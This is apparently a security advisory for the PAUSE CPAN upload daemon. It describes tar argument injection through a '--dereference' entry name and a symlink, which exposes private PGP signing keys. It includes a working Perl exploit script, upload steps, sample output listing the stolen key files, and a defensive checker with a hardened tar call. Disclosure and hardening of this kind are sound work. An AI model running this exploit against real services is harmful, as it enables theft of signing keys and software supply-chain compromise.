Summary
It may be possible to extract any file or directory accessible to the user running paused via a crafted tarball upload. The PoC below demonstrates how an attacker can instrument a tarball with malicious entries to exfiltrate the private PGP keys from /home/pause/pause-private. A local installation of PAUSE has been used to find this issue.
Details
When paused recreates tarballs that have files with world writable permissions, we can inject a --dereference option as a filename via @children in _rewrite_tarball (pause/bin/paused, line 908 in 9d85ccc):

    $rc = 0 == system tar => $taropt, "-cf", $path, @children or die "Could not tar c";

This allows symlinks to be followed, and we can use symlinks in the original tarball to include any path on the filesystem that the pause user has access to. These paths will be included in the recreated tarball, which will be available to the attacker (and probably everyone else).
PoC
- Prepare a distribution for upload, for example SymlinkAttack-0.001.tar.gz
- Use the script below to add the exploit code to the tarball:
  $ ./inject-exploit.pl SymlinkAttack-0.001.tar.gz
- Upload the tarball as an author to PAUSE, and wait for paused to process it
- Download the rewritten tarball, now containing the contents of /home/pause/pause-private, from /pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gz
#!/usr/bin/env perl
use strict;
use warnings;
use Archive::Tar;
use File::Basename;
my ($tarball) = $ARGV[0] or die "usage: $0 dist.tar.gz\n"; # Tarball to inject attack into
my $basename = basename($tarball, ".tar.gz");
my $tar = Archive::Tar->new;
$tar->read($tarball) or die "Failed to read $tarball";
# Inject an additional argument to the tar command used when recreating
# tarballs, this will become a "multiple root" tarball that is not indexed
$tar->add_data("--dereference", "foo");
# Create a file with world writable permissions, to trigger the actual
# recreation of tarball
$tar->add_data("$basename/world-writable", "foo", { mode=> 0777});
$tar->add_data("$basename/LOOT", '', {
type => Archive::Tar::SYMLINK,
# Directory containing files we want to steal
linkname => "/home/pause/pause-private/",
# Set mode 0755 so paused doesn't attempt to
# chmod it, symlinks are 0777 usually
mode => 0755
});
# Write the modified tarball back
$tar->write($tarball, 1) or die "Failed to write tarball";
Example tarball output:
# tar tvvf /data/pause/pub/PAUSE/authors/id/U/US/USER/SymlinkAttack-0.001.tar.gz | grep LOOT
drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/
drwx------ pause/pause 0 2024-11-01 19:52 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/
-rw------- pause/pause 32 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx~
drwx------ pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/
-rw------- pause/pause 2867 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/CBEA3D65A6CD867B05CB80E89ED067BB1D33DCDB.key
-rw------- pause/pause 2869 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/private-keys-v1.d/8916C5A361323FC2377CF477BF145A1001A3F626.key
-rw-r--r-- pause/pause 1963 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/pubring.kbx
-rw------- pause/pause 1200 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/gnupg-pause-batch-signing-home/trustdb.gpg
drwxr-xr-x pause/pause 0 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/
-rw-r--r-- pause/pause 508 2024-11-01 16:04 SymlinkAttack-0.001/LOOT/lib/PrivatePAUSE.pm
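As an added example that is not part of the original advisory or of the PAUSE code base: a Perl pre-check over an uploaded tarball's entries that flags exactly the entry kinds the PoC relies on (an option-like name, a link pointing outside the distribution), together with a hardened counterpart of the tar call in _rewrite_tarball that terminates option parsing with `--`. The names check_entries and rewrite_safely are assumptions.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use Archive::Tar;

# Return a list of reasons an uploaded tarball must not be fed to
# "tar -cf ... @children". An empty list means the entries look safe.
# (Hypothetical helper; not part of paused.)
sub check_entries {
    my ($tar) = @_;
    my @problems;
    for my $entry ($tar->get_files) {
        my $name = $entry->full_path;
        # A name beginning with '-' is parsed by tar as an option
        # (e.g. --dereference) unless the argument list is terminated by '--'.
        push @problems, "option-like name: $name" if $name =~ /^-/;
        # Symlinks and hardlinks can point anywhere the service user can read;
        # a dereferencing tar would copy the target into the public tarball.
        push @problems, "link entry: $name -> " . $entry->linkname
            if $entry->is_symlink || $entry->is_hardlink;
        # Absolute paths or '..' components escape the distribution directory.
        push @problems, "path escapes distribution: $name"
            if $name =~ m{^/} || grep { $_ eq '..' } split m{/}, $name;
    }
    return @problems;
}

# Hardened counterpart of the tar call in _rewrite_tarball: refuse option-like
# names outright and always put '--' before the file list, so nothing taken
# from the uploaded archive can ever be interpreted as an option.
sub rewrite_safely {
    my ($path, $taropt, @children) = @_;
    die "refusing option-like entry name: $_\n" for grep { /^-/ } @children;
    my @cmd = ('tar', (length($taropt // '') ? $taropt : ()), '-cf', $path, '--', @children);
    return system(@cmd) == 0;
}

# Usage: ./check-upload.pl SymlinkAttack-0.001.tar.gz
my ($tarball) = @ARGV or die "usage: $0 dist.tar.gz\n";
my $tar = Archive::Tar->new($tarball) or die Archive::Tar->error, "\n";
my @problems = check_entries($tar);
if (@problems) {
    print "REJECT $tarball:\n", map { "  $_\n" } @problems;
    exit 1;
}
print "OK $tarball\n";
```

Run against the tarball produced by inject-exploit.pl, the check reports both the --dereference entry and the LOOT symlink, which is what a rewrite step should refuse before ever invoking tar.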